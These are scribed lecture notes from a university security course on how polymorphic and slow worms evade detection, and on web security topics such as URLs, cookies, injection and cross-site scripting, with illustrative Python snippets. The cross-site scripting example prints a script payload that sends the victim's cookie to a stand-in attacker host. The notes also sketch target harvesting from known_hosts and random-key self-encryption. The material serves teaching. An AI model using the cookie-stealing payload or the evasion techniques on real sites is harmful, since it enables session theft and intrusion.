CIS 551 / TCOM 401
April 13, 2006
Lecture 23. Polymorphic Viruses and Evasion Techniques, Web Security
Scribed by Taehyun Kim
▪ Plan for today
- wrap up the discussion of viruses and worms
- web security
▪ Earlybird
- looks at traffic at a large scale in the Internet.
- looks for common, invariant data in packets that occurs with high frequency and with wide dispersion in source and destination addresses. → this is the typical pattern that most worms exhibit. (A minimal sketch of this content-sifting idea appears after this list.)
- To avoid getting detected by Earlybird, attackers can violate one of these three assumptions.
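A minimal Python sketch of the content-sifting idea (not the actual Earlybird implementation, which uses fingerprinting and multistage filters; the chunk size and thresholds below are made-up illustrative values): count how often each fixed-length payload substring appears and how many distinct source and destination addresses it shows up with, then flag substrings that are both frequent and widely dispersed.

    from collections import defaultdict

    CHUNK = 40            # bytes of invariant content to track (illustrative)
    FREQ_THRESHOLD = 3    # minimum number of sightings (illustrative)
    ADDR_THRESHOLD = 3    # minimum distinct sources/destinations (illustrative)

    counts = defaultdict(int)
    sources = defaultdict(set)
    dests = defaultdict(set)

    def sift(src, dst, payload):
        """Record every CHUNK-byte substring of this packet's payload."""
        for i in range(len(payload) - CHUNK + 1):
            sig = payload[i:i + CHUNK]
            counts[sig] += 1
            sources[sig].add(src)
            dests[sig].add(dst)

    def suspicious():
        """Substrings that are frequent AND widely dispersed in addresses."""
        return [sig for sig in counts
                if counts[sig] >= FREQ_THRESHOLD
                and len(sources[sig]) >= ADDR_THRESHOLD
                and len(dests[sig]) >= ADDR_THRESHOLD]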
<Breaking 1st assumption>
▪ Polymorphic viruses/worms
- make it hard to have invariant content.
- mutate themselves as they replicate, so that offspring and parents are less similar to each other.
- Looking for frequently appearing substrings is not going to catch them.
- The mutation should be done globally, over the whole body of the code.
- They also have to be able to generate lots of random permutations. (Otherwise, they will still be detected by Earlybird.)
▪ Strategy
- Spam: using different subject lines - very simple.
- The virus, as it's replicating, generates keys randomly and encrypts its contents: the virus somehow decrypts the main body of the code using a random key and jumps to the code it decrypted. When the virus creates a new instance of itself, it generates a random key, encrypts most of the virus with this random key, and then copies out that encrypted version plus a bootstrapping part of the virus that has the key embedded in it. The virus has to have this bootstrapping part, which accesses the key and decrypts the rest, but the decryption part of the code is going to be invariant across instances of the virus. (A toy sketch of this re-encryption idea follows this list.)
- Project 1 buffer overflow: we have a lot of latitude over what assembly code instructions we put at the beginning. It is easiest to just put NOPs, but by doing just a little bit of work we can make the code look different for every instance.
- There are lots of ways you can generate instructions that have the effect of a NOP.
- Reordering independent instructions.
- Using different register names.
- Using equivalent instruction sequences.
- Suppose that the worm is somehow able to infect a program that communicates using a secure channel. The worm will be encrypted automatically as part of the natural behavior of the machine, so it's not going to be filtered.
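A toy Python sketch of the random-key re-encryption strategy from the list above (purely illustrative; XOR stands in for whatever cipher a real virus would use, and no malicious code is involved): only the small bootstrap routine stays constant, while the encrypted body looks different in every copy.

    import os

    def make_instance(body: bytes):
        """Encrypt the body under a fresh random key (XOR as a stand-in cipher)."""
        key = os.urandom(16)
        encrypted = bytes(b ^ key[i % len(key)] for i, b in enumerate(body))
        # A real polymorphic virus would ship this encrypted blob together with
        # the invariant bootstrap (decryption) routine and the embedded key.
        return key, encrypted

    def bootstrap(key: bytes, encrypted: bytes) -> bytes:
        """The invariant part: recover the body (here we just return it)."""
        return bytes(b ^ key[i % len(key)] for i, b in enumerate(encrypted))

    body = b"stand-in for the main body of the worm"
    key1, enc1 = make_instance(body)
    key2, enc2 = make_instance(body)
    assert bootstrap(key1, enc1) == body   # every instance decrypts to the same body
    assert enc1 != enc2                    # but the bytes on the wire differ each time

As the notes point out, the decryption bootstrap itself is still invariant across instances, so a detector would have to focus on that part.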
<Breaking 2nd assumption>
▪ Worms don't have to scan randomly
- You need some way of getting access to a list of good machines. Suppose you want a virus or worm that would target a particular kind of web server. The best way to spread your worm is to directly contact a whole bunch of web servers that are running a particular version of fetch. → Google (powered by php / supported by fetch version…)
- You can make a meta-server worm, which uses the facilities of the Internet itself to figure out where other vulnerable machines might be.
- Also make use of topological information. If you infect a local machine running on the network and you have full control of that machine, you can listen to the protocol to find out the names of other machines nearby. You don't have to generate your attack addresses randomly; you can just do a topological search of the space to look for particular vulnerable software. → Email viruses need to know the names of valid addresses, and it would be pretty hard to just guess them randomly. Instead, they can walk through address books. (A benign illustration of this kind of local harvesting follows this list.)
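A benign Python illustration of the topological point above (read-only; the file path is the standard SSH location): a program running on a compromised host can learn the names of nearby machines simply by reading files the machine already has, instead of guessing addresses randomly.

    from pathlib import Path

    def harvest_known_hosts(path="~/.ssh/known_hosts"):
        """Collect host names this machine has already talked to over SSH."""
        hosts = set()
        p = Path(path).expanduser()
        if p.exists():
            for line in p.read_text(errors="ignore").splitlines():
                if line.strip() and not line.startswith("#"):
                    # the first field is a comma-separated list of names/addresses
                    hosts.update(line.split()[0].split(","))
        return sorted(hosts)

    print(harvest_known_hosts())

Email viruses do the analogous thing by walking through address books.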
<Breaking 3rd assumption>
▪ Propagate slowly
- This is sort of counterintuitive. Most analyses focus on how quickly worms maliciously take over some fraction of the vulnerable machines. However, it might be more destructive in the long run to take a very slow approach to infecting machines, being very careful not to set off any kind of intrusion detection system that looks for unusual-frequency behavior. By slowly and subtly changing a bunch of small things over time, you can corrupt a lot of data before anything is noticeable.
▪ Witty Worm
- It was trying to spread quickly.
- used one of the UDP single-packet attacks.
- It was limited only by bandwidth, so it didn't need to worry about the round-trip time on the Internet.
- The payload was supposed to slowly and randomly corrupt disk blocks over time.
- The flaw had been announced the previous day. This means that some hacker was able to figure out the appropriate buffer overflow, construct the single-packet attack in one day, and generate this worm.
- The UCSD network telescope picked it up.
▪ Web Security
Q: What are the things you worry about when using web applications?
A: Class answers
- Links can lie in multiple ways – they may not take you where you think they do.
- More malicious users (authentication is a problem)
- Cookies can reveal private information and raise questions of security.
- Spyware / malware: the mobile code problem (Java applets and so on)
- Eavesdropping / keyloggers
- Knowing what's going on: configuration management – not so much a web security thing.
- Embedded code / scripts / Flash / ActiveX / … : executable content
- Authorization, etc.: access control
- Profile stealing
- Trusting remote sites with your confidential information
▪ Open Web Application Security Project
: looked at a large number of web applications to see what the biggest problems are.
- unvalidated input, buffer overflows, injection flaws, cross-site scripting, etc. (an injection example follows this list)
- A lot of web developers (typically web designers) have no actual experience with thinking about security.
- Inappropriate error handling: revealing too much information in the data you send back.
- Insecure storage
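To make the "injection flaws" item concrete, a minimal Python/SQLite sketch (the table and column names are made up): building a query by pasting in user input lets that input change the query, while a parameterized query treats it as plain data.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

    user_input = "' OR '1'='1"   # attacker-controlled string

    # Vulnerable: the input is pasted directly into the SQL text.
    rows = conn.execute(
        "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()
    print("unvalidated input returns:", rows)    # every row comes back

    # Safer: the input is passed as a parameter, never interpreted as SQL.
    rows = conn.execute(
        "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
    print("parameterized query returns:", rows)  # nothing comes back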
▪ HTTP
: the protocol on which the web is built.
- Stateless: the server doesn't keep any connection state about which clients have contacted it in the past. That makes it very hard to do things like having a session at Amazon that keeps track of what you have in your shopping cart. However, stateless protocols are much more scalable. → trade-off
▪ HTTP headers
- Connection information: modern versions of HTTP allow you to reuse the same TCP connection for multiple requests and responses with the server. Each request/response exchange is self-contained, but the server will still maintain the TCP connection for the client. (In the original version, if a client downloaded a web page containing 20 pictures, every picture required another TCP handshake.)
- Cookie information: whenever you contact a server, your web browser automatically uploads the cookies that were previously left on your machine.
- Client information: what kind of web browser is running, what kind of operating system is running. You can just snoop some HTTP traffic and find out that people on a certain machine are running a certain version of Internet Explorer.
- Preference for the data it gets back. (A sample request showing these headers follows this list.)
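A small Python snippet that prints a plausible HTTP/1.1 request carrying the header fields mentioned above (the host name, cookie value, and User-Agent string are made up for illustration):

    request = (
        "GET /index.html HTTP/1.1\r\n"
        "Host: www.example.com\r\n"        # hypothetical server
        "Connection: keep-alive\r\n"       # reuse the TCP connection
        "Cookie: session=abc123\r\n"       # cookie previously set by this server
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
        "Accept: text/html,image/png\r\n"  # preference for the data sent back
        "\r\n"
    )
    print(request)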
▪ First issue of security
: URLs (which are used to identify the content, servers, and clients).
- A lot of the server security issues that come up on the web arise because URLs are complicated.
- You can embed lots of content in the URL itself. Because HTTP is stateless, one of the tricks you can do is store state in the URLs. You can actually see really complicated strings of parameters when you go to a web page.
- In terms of security, there are a lot of possibilities for misusing URLs. The most common thing is to change the URLs. (Ex: whitehouse.org, whitehouse.com)
- Also, you can make URLs unreadable: use IP addresses instead of domain names, or encode characters as Unicode/percent escapes instead of the plain ASCII syntax. (A small decoding example follows this list.)
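A small Python example of the unreadable-URL point, using the standard urllib.parse module (the URL itself is made up): percent-escaped characters hide a familiar name until they are decoded.

    from urllib.parse import unquote

    # The host name and path are spelled with percent-escapes instead of plain ASCII.
    obfuscated = "http://%77%77%77%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d/%6c%6f%67%69%6e"
    print(unquote(obfuscated))   # http://www.example.com/login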
▪ Second Issue
: Stateless
- Embed state in the URL.
- Hidden input fields: you can add these to web pages, and then the client will post that information back to the server. The server can save information across requests by giving you back a web page that has hidden input fields: it sets a hidden text box with some string it wants to remember, and the next time you click on some link, that string is posted back to the server. So the server can remember state across actions of the client by hiding information in hidden input fields. You can detect this easily by just looking at the source code of the web page you get back. (A tiny example follows this list.)
- Cookies: these store data on the client machine.
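A tiny illustration of the hidden-input-field trick (the form field and value are made up), written as a Python string so it can be printed and inspected just as one would view the page source:

    page = """
    <form action="/checkout" method="post">
      <!-- state the server wants to remember, invisible in the rendered page -->
      <input type="hidden" name="cart_id" value="A17X-9Q2">
      <input type="submit" value="Continue">
    </form>
    """
    print(page)   # 'View Source' in a browser reveals the same hidden state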
▪ Cookies
- Whenever the server wants to store something on the client, it just sends back a reply that has a Set-Cookie line as part of the header (the name of the cookie = some value). These are strings that are remembered by the web browser.
- The server can specify a path and a domain. Cookies can be associated with particular domain names and particular paths within a domain. Those restrict when the cookies will be sent back to the server.
- Setting a flag called 'secure' tells the client to send the cookie back only over a secure connection.
- Whenever the client requests a URL from the server, the browser looks through the cookie cache to see if any of the cookies you have match the URL in the domain name and path specified in the cookies. If so, it adds those cookie lines to the request message. (An example of this exchange follows this list.)
- New instances of cookies overwrite old ones. This can be exploited by cross-site scripting attacks.
- Clients aren't required to purge cookies when they expire.
- Cookies are at most 4 Kbytes long, to prevent malicious servers from overloading clients with too much cookie data.
- An HTTP proxy server shouldn't cache any Set-Cookie headers, because that state could otherwise be replayed to other clients.
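A short example of the Set-Cookie / Cookie exchange described above, using Python's standard http.cookies module (the cookie name, domain, and path are made up):

    from http.cookies import SimpleCookie

    # Server side: build a Set-Cookie header with domain, path, and secure attributes.
    c = SimpleCookie()
    c["session"] = "abc123"
    c["session"]["domain"] = "example.com"
    c["session"]["path"] = "/shop"
    c["session"]["secure"] = True    # send back only over a secure connection
    print(c.output())
    # prints something like: Set-Cookie: session=abc123; Path=/shop; Domain=example.com; Secure

    # Client side: on a later request to a matching domain and path, the browser
    # adds a header of the form:
    print("Cookie: session=abc123")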
▪ Cross-site scripting
- Web browsers don't just display HTML; they also run code. On the client side, you can have embedded scripts that get executed by the browser locally. The server also typically runs executable content, because we want dynamically generated web pages with new information.
- CGI: allows the server to run arbitrary code written in any programming language (typically written in C or Perl).
- PHP: like a preprocessor for HTML.
▪ How cross-site scripting works
- Suppose you try to access 'foo.html', which doesn't exist. Then the server will give you back a web page with the error message 'not found'. The URL contains 'foo.html', and 'foo.html' somehow has to show up inside this web page as text. That means that the server, when it generates this error message, copies some piece of the URL into the HTML. Instead of foo.html, we can embed some JavaScript. If the server just copies this string into the HTML page, the JavaScript that got embedded into the error message by the server will run on the client's machine. However, this sort of attack is becoming well known, so some modern servers won't just naively copy the URL. (A minimal sketch follows.)
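A minimal Python sketch of the reflected error page described above (the function names are hypothetical): the naive handler copies the requested path straight into the HTML, so a script embedded in the URL runs in the victim's browser, while the escaped version renders it as harmless text.

    import html

    def naive_not_found(path):
        # Vulnerable: the requested path is copied verbatim into the page.
        return "<html><body>404: " + path + " not found</body></html>"

    def escaped_not_found(path):
        # Safer: special characters are escaped, so the browser shows them as text.
        return "<html><body>404: " + html.escape(path) + " not found</body></html>"

    attack = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(naive_not_found(attack))    # the script tag survives and would execute
    print(escaped_not_found(attack))  # rendered as inert text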